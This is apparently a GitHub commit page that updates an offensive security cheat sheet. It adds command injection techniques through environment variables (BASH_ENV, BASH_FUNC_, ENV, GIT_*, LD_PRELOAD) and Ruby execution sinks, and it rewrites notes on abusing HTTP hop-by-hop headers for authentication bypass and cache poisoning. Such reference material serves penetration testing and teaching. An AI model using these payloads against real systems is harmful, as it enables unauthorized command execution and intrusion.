Skip to content

Commit

Permalink
Merge pull request #129 from 0xn3va/develop
Browse files Browse the repository at this point in the history 
Command injections & small updates
  • Loading branch information
@0xn3va
0xn3va authored Jun 26, 2022
2 parents 9742906 + daf0046 commit 783d3e0
Show file tree
Hide file tree
Showing 7 changed files with 444 additions and 56 deletions.
1 change: 1 addition & 0 deletions Container/Escaping/cve-list.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@

| CVE | Title | Affected versions | References |
| --- | --- | --- | --- |
| [CVE-2022-23648](https://github.com/containerd/containerd/security/advisories/GHSA-crp2-qrr5-8pq7) | Containers that launched through containerd's CRI implementation with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host | <p><= 1.4.12</p><p>1.5.0 - 1.5.9</p><p>1.6.0</p> | <p>> [Technical Advisory: containerd - Insecure handling of image volumes](https://bugs.chromium.org/p/project-zero/issues/detail?id=2244)</p><p>> [PoC for CVE-2022-23648](https://github.com/raesene/CVE-2022-23648-POC)</p> |
| [CVE-2021-41103](https://github.com/containerd/containerd/security/advisories/GHSA-c2h3-6mxw-7mvq) | Insufficiently restricted permissions on container root and plugin directories | <p><1.4.11</p><p><1.5.7</p> | [Github advisories: GHSA-c2h3-6mxw-7mvq](https://github.com/containerd/containerd/security/advisories/GHSA-c2h3-6mxw-7mvq) |
| [CVE-2021-32760](https://github.com/containerd/containerd/security/advisories/GHSA-c72p-9xmj-rx3w) | Archive package allows chmod of file outside of unpack target directory | <p><=1.4.7</p><p><=1.5.3</p> | [Github advisories: GHSA-c72p-9xmj-rx3w](https://github.com/containerd/containerd/security/advisories/GHSA-c72p-9xmj-rx3w) |
| [CVE-2021-21334](https://github.com/containerd/containerd/security/advisories/GHSA-6g2q-w5j3-fwh4) | containerd CRI plugin: environment variables can leak between containers | <p><=1.3.9</p><p><= 1.4.3</p> | [Github advisories: GHSA-6g2q-w5j3-fwh4](https://github.com/containerd/containerd/security/advisories/GHSA-6g2q-w5j3-fwh4) |
Expand Down
1 change: 1 addition & 0 deletions Container/Escaping/exposed-docker-socket.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -144,5 +144,6 @@ To execute commands on the host system, start the Docker container and mount the

# References

- [Writeup: Microsoft Dynamics Container Sandbox RCE via Unauthenticated Docker Remote API 20,000$ Bounty](https://hencohen10.medium.com/microsoft-dynamics-container-sandbox-rce-via-unauthenticated-docker-remote-api-20-000-bounty-7f726340a93b)
- [Write up: Escaping the Cloud Shell container](https://offensi.com/2019/12/16/4-google-cloud-shell-bugs-explained-introduction/)
- [Quarkslab's Blog: Why is Exposing the Docker Socket a Really Bad Idea?](https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html)
1 change: 1 addition & 0 deletions Mobile Application/Android/Deep Linking Vulnerabilities/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -110,6 +110,7 @@ References:
- [WebView Vulnerabilities: Bypass URL validation](/Mobile%20Application/Android/WebView%20Vulnerabilities/README.md#bypass-url-validation)
- [Report: [Grab Android/iOS] Insecure deeplink leads to sensitive information disclosure](https://hackerone.com/reports/401793)
- [Writeup: Breaking The Facebook For Android Application](https://ash-king.co.uk/blog/facebook-bug-bounty-09-18)
- [Writeup: When Equal is Not, Another WebView Takeover Story](https://valsamaras.medium.com/when-equal-is-not-another-webview-takeover-story-730be8d6e202)

## Bypass local authentication

Expand Down
64 changes: 37 additions & 27 deletions Web Application/Abusing HTTP hop-by-hop Request Headers/README.md
View file
Original file line number Diff line number Diff line change
@@ -1,14 +1,16 @@
This section covers techniques which can be used to influence web systems and applications in unexpected ways, by abusing HTTP/1.1 hop-by-hop headers. Systems affected by these techniques are likely to have multiple caches / proxies that process requests before reaching the server application.
This section covers techniques which can be used to influence web systems and applications in unexpected ways, by abusing HTTP/1.1 hop-by-hop headers. Systems affected by these techniques are likely to have multiple caches/proxies that process requests before reaching a server application.

# Hop-by-hop request header
# Hop-by-hop request headers

The specification [RFC 2612](https://tools.ietf.org/html/rfc2616#section-13.5.1) defines two categories of HTTP headers:
- End-to-end headers, which are transmitted to the ultimate recipient of a request or response. End-to-end headers in responses **must** be stored as part of a cache entry and **must** be transmitted in any response formed from a cache entry.
- Hop-by-hop headers, which are meaningful only for a single transport-level connection, and are not stored by caches or forwarded by proxies.

In other words, a hop-by-hop header designed for processing and using by the proxy server that is currently processing the request, unlike the end-to-end header, which is designed to be present in the request until the end of the request.
- `End-to-end headers` that are transmitted to the ultimate recipient of a request or response. End-to-end headers in responses **must** be stored as part of a cache entry and **must** be transmitted in any response formed from a cache entry.
- `Hop-by-hop headers` that are meaningful only for a single transport-level connection, and are not stored by caches or forwarded by proxies.

In other words, a hop-by-hop header designed for processing and using by a proxy server that is currently processing a request, unlike an end-to-end header that is designed to be present in a request until the end of the request.

The specification [RFC 2612](https://tools.ietf.org/html/rfc2616#section-13.5.1) defines the following headers as hop-by-hop by default:

- `Keep-Alive`,
- `Transfer-Encoding`,
- `TE`,
Expand All @@ -23,55 +25,63 @@ All other headers defined by HTTP/1.1 are end-to-end headers.
If hop-by-hop headers are found in the request, a compatible proxy server should process or perform actions regardless of what these headers indicate, and not forward them to the next hop.

A request [may also define a custom set of headers to be treated as hop-by-hop](https://tools.ietf.org/html/rfc2616#section-14.10) by adding them to the `Connection` header, like this:

```http
Connection: close, X-Foo, X-Bar
```
The client asks the proxy server to treat `X-Foo` and` X-Bar` as hop-by-hop, which means that the client wants the proxy to remove them from the request before sending the request.

A client asks a proxy server to treat `X-Foo` and` X-Bar` as hop-by-hop, which means that a client wants a proxy to remove them from a request before sending it.

# Abusing HTTP hop-by-hop request headers

The `Connection` header itself is the default hop-by-hop header. This implies that a compatible proxy server should not forward a list of custom hop-by-hop headers to the next server in the chain in its `Connection` header when it forwards the request. However, in practice this does not always occur, some systems either forward the entire `Connection` header or copy the hop-by-hop list and add it to their own `Connection` header. For example, most likely HAProxy pass the `Connection` header untouched, the same behavior with Nginx in reverse proxy mode.
The `Connection` header itself is the default hop-by-hop header. This implies that a compatible proxy server should not forward a list of custom hop-by-hop headers to the next server in the chain in its `Connection` header when it forwards the request. However, in practice this does not always occur, some systems either forward the entire `Connection` header or copy a hop-by-hop list and add it to their own `Connection` header. For example, most likely HAProxy pass the `Connection` header untouched, the same behavior with Nginx in reverse proxy mode.

The following image shows how abusing hop-by-hop headers may cause problems if a backend expects a `X-Important-Header` and considers its presence in the logical decision.

The following image shows how abusing hop-by-hop headers may cause problems if the backend expects a `X-Important-Header` and considers its presence in the logical decision.
![](img/hbh-theory-diagram.png)

![hbh-theory-diagram](img/hbh-theory-diagram.png)
A quick and easy way to verify that systems are vulnerable to some sort of abuse hop-by-hop request header is to use a `Cookie` header for an endpoint which requires authentication (assuming the target system uses cookie authentication). For example, let's assume that the `/api/users/profile` endpoint returns `200 OK` with information about user. In this case, the following request may return something other than the expected response if a system is vulnerable:

A quick and easy way to verify that systems are vulnerable to some sort of abuse hop-by-hop request header is to use a `Cookie` header for an endpoint which requires authentication (assuming the target system uses cookie authentication). For example, if `/api/users/profile` endpoint returns `200 OK` with information about the user profile, the request:
```http
GET /api/users/profile HTTP/1.1
Host: vulnerable-website.com
Cookie: sessionid=...
Connection: close, Cookie
```
may return something other than the expected response if the system is vulnerable to abusing HTTP hop-by-hop request headers. To search for more interesting effects, you can use Burp Suite Intruder or a custom script with a list of known headers, like [this one](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers).

## Masking the source IP address
To search for more interesting effects, you can use Burp Suite Intruder or a custom script with a list of known headers, like [this one](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers).

When an frontend proxy server accepts a user's request, it can add the IP address of that user to the `X-Forwarded-For` header so that the infrastructure and applications in the backend can know the user's source IP address. However, if we instruct proxies that `X-Forwarded-For` header is hop-by-hop, it will be removed from the request, and the backend application will either never receive it, or receive the IP address of the sever in elsewhere in the chain.
## Bypass authentication or access control decisions

In addition to masking the source IP address from some components of the system infrastructure, this method may offer a way to bypass authentication or access control decisions. For example, if a request is detected that originates from a local range of IP addresses, the application processes the request as trusted and provides access to internal resources.
If an application relies on the presence/absence of any headers when making an authentication/authorization decision, abusing hop-by-hop headers can be used to bypass such implementations.

{% hint style="info" %}
Do not forget that `X-Forwarded-For` header is not the only header for transmitting the user's real IP address, `Forwarded`, `X-Real-IP` and many others are also used.
{% endhint %}
{% embed url="https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/" %}

## Fingerprinting services
## Cache poisoning DoS

When searching for hop-by-hop headers, you should pay attention to the differences in the responses that the server sends. Removing technology-specific or stack-specific HTTP headers can cause various side effects that allow you to collect more information about the system. The more specific the header, the more accurate the system's fingerprint.
The impact in this case is very similar to achieved with the usual [Cache Poisoning DoS](https://cpdos.org). However, in this case the method is slightly different - instead of directly using or modifying request headers which create unwanted application state and poison a web cache, hop-by-hop headers are used to create this unwanted state and remove headers on which an application relies in order to function normally.

## Cache poisoning DoS
To exploit Cache Poisoning DoS, it requires:

The impact in this case is very similar to achieved with the usual [Cache Poisoning DoS](https://cpdos.org). However in this case the method is slightly different - instead of directly using or modifying request headers which create unwanted application state and poison a web cache, we use hop-by-hop headers to create this unwanted the application's state and remove the headers on which the application relies in order to function normally.
1. A frontend cache forwards a custom set of hop-by-hop headers, instead of process them.
2. Any intermediate proxies in the chain process the custom set and remove headers.
3. An application considers the presence of these headers and, if they are absent, return an unwanted response, for example, `400 Bad Request` or `501 Not Implemented`.

To exploit this, it is necessary that:
As a result, web cache before an application will cache this unwanted response and return to other users.

1. A frontend cache should forward a custom set of hop-by-hop headers, instead of process these.
2. Any intermediate proxy in the chain should process the custom set and remove the headers.
3. The application should consider the presence of these headers and, if they are absent, return an unwanted response, for example, `400 Bad Request` or `501 Not Implemented`.
## Fingerprinting services

As a result, this can lead to the fact that the web cache before the application caches this unwanted response and uses it to serve other users, and therefore we have a cache poisoning denial of service.
When looking for hop-by-hop headers, look for differences in the responses that a server sends. Removing technology-specific or stack-specific HTTP headers can cause various side effects that allows collecting more information about an application. The more specific headers, the more accurate an application's fingerprint.

## Masking the source IP address

When a frontend proxy server accepts a user's request, it can add a user's IP address to the `X-Forwarded-For` header, so that a backend knows a user's IP address. However, if you tell a proxy that `X-Forwarded-For` header is hop-by-hop, it will remove the header from the request. So a backend will either never receive a user's IP address, or receive an IP address of an element in elsewhere in the chain.

{% hint style="info" %}
Remeber that `X-Forwarded-For` header is not the only header for transmitting a user's IP address. `Forwarded`, `X-Real-IP` and etc. can be used as well.
{% endhint %}

# References

- [Abusing HTTP hop-by-hop request headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers)
- [Python script to find hop-by-hop header abuse potential against the provided URL](https://gist.github.com/ndavison/298d11b3a77b97c908d63a345d3c624d)
- [Python script to find hop-by-hop header abuse potential against the provided URL](https://gist.github.com/ndavison/298d11b3a77b97c908d63a345d3c624d)
167 changes: 165 additions & 2 deletions Web Application/Command Injection/README.md
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,144 @@
# Environment variables

## BASH_ENV

You can use `BASH_ENV` with bash to achieve a command injection:

```bash
$ BASH_ENV='$(id 1>&2)' bash -c 'echo hello'
uid=0(root) gid=0(root) groups=0(root)
hello
```

References:
- [Research: How do I use environment variable injection to execute arbitrary commands](https://tttang.com/archive/1450/#toc_0x06-bash_env)

## BASH_FUNC_*%%

You can use `BASH_FUNC_*%%` to initialize an anonymous function according to the value of the environment variable and give it a name. The following sample adds `myfunc` function to the bash context:

```bash
$ env $'BASH_FUNC_myfunc%%=() { id; }' bash -c 'myfunc'
uid=0(root) gid=0(root) groups=0(root)
```

Moreover, you can override an existing functions:

```bash
$ env $'BASH_FUNC_echo%%=() { id; }' bash -c 'echo hello'
uid=0(root) gid=0(root) groups=0(root)
hello
```

References:
- [Research: How do I use environment variable injection to execute arbitrary commands](https://tttang.com/archive/1450/#toc_0x08)

## ENV

When you force the [dash](https://linux.die.net/man/1/dash) to behave interactively, dash will look for `ENV` environment variable and pass it into `read_profile` function:

```c
if ((shinit = lookupvar("ENV")) != NULL && *shinit != '\0') {
read_profile(shinit);
}
```

`read_profile` will print the `ENV` content:

```bash
$ ENV='$(id 1>&2)' dash -i -c 'echo hello'
uid=0(root) gid=0(root) groups=0(root)
hello
```

You can gain the same result with `sh`:

```bash
$ ENV='$(id 1>&2)' sh -i -c "echo hello"
uid=0(root) gid=0(root) groups=0(root)
hello
```

References:
- [Research: How do I use environment variable injection to execute arbitrary commands](https://tttang.com/archive/1450/#toc_0x03-dash)

## GIT_*

The following `GIT_*` parameters can be used to abuse a git directory:

- [GIT_DIR](https://git-scm.com/book/en/v2/Git-Internals-Environment-Variables) is the location of the `.git` folder
- [GIT_PROXY_COMMAND](https://git-scm.com/docs/git-config#Documentation/git-config.txt-coregitProxy) is used for overridding `core.gitProxy`
- [GIT_SSH_COMMAND](https://git-scm.com/docs/git-config#Documentation/git-config.txt-coresshCommand) is used for overridding `core.sshCommand`
- [GIT_EXTERNAL_DIFF](https://git-scm.com/docs/git-config#Documentation/git-config.txt-diffexternal) is used for overridding `diff.external`

{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/parameters-injection@abusing-a-git-directory" %}

## LD_PRELOAD

`LD_PRELOAD` is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library `libc.so`.

In Linux C, functions can be declared with attributes within the function definition. This is done by adding the desired attributes to the function definition. There are two attributes of interest, [constructor and destructor](https://gcc.gnu.org/onlinedocs/gcc-4.7.0/gcc/Function-Attributes.html). A function with the `constructor` attribute will run before the program executes `main()`. For shared objects, this would occur at load time. A function declared with the `destructor` attribute should run once `main()` has returned or `exit()` is called.

{% hint style="info" %}
LD_PRELOAD can be used to override the standard libc calls, check [Abusing LD_PRELOAD for fun and profit](https://www.sweharris.org/post/2017-03-05-ld-preload/)
{% endhint %}

In other words, you can compile a shared library to be invoked at load time and/or before return:

1. Reuse the following code for compiling a shared library:

{% embed url="https://raw.githubusercontent.com/ProfessionallyEvil/LD_PRELOAD-run-at-load-time/main/src/inject.c" %}

2. Compile the shared library with the next command:

```bash
$ gcc -Wall -O3 -fPIC -shared inject.c -o inject.so
```

3. Exploit:

```bash
$ LD_PRELOAD=./inject.so git -v
[+] Inject.so Loaded!
[*] PID: 1337
[*] Process: /usr/bin/git
Unknown option: -v
usage: git [--version] [--help] [-C <path>] [-c name=value]
[--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
[-p | --paginate | --no-pager] [--no-replace-objects] [--bare]
[--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
<command> [<args>]
[-] Inject.so is being unloaded!
```
```bash
$ LD_PRELOAD=./inject.so id
[+] Inject.so Loaded!
[*] PID: 1337
[*] Process: /usr/bin/id
uid=0(root) gid=0(root) groups=0(root)
```
```bash
$ LD_PRELOAD=./inject.so bash -c "echo 'hello'"
[+] Inject.so Loaded!
[*] PID: 1337
[*] Process: /bin/bash
hello
[-] Inject.so is being unloaded!
```
References:
- [LD_PRELOAD: How to Run Code at Load Time](https://www.secureideas.com/blog/2021/02/ld_preload-how-to-run-code-at-load-time.html)
# Languages
## Go
Expand Down Expand Up @@ -160,8 +301,30 @@ system("os command here")
# backticks
`os command here`
# open
open("\| os command here")
# Kernel.open
# https://ruby-doc.org//core-2.2.0/Kernel.html#method-i-open
open("| os command here")
# Kernel.exec
Kernel.exec("os command here")
# open-uri.open
# https://sakurity.com/blog/2015/02/28/openuri.html
open("| os command here")
# Object.send
# https://bishopfox.com/blog/ruby-vulnerabilities-exploits
# additionally, check out Object.public_send
# https://apidock.com/ruby/Object/public_send
1.send("eval","`os command here`")
"".send("eval","`os command here`")
# %x command
%x os-command-here<SPACE>
%x os-command-here ;
%x(os-command-here)
%x|os-command-here|
%x{os-command-here}
# https://docs.ruby-lang.org/en/2.0.0/Open3.html
# Open3.popen3
Expand Down
Loading

0 comments on commit 783d3e0

Please sign in to comment.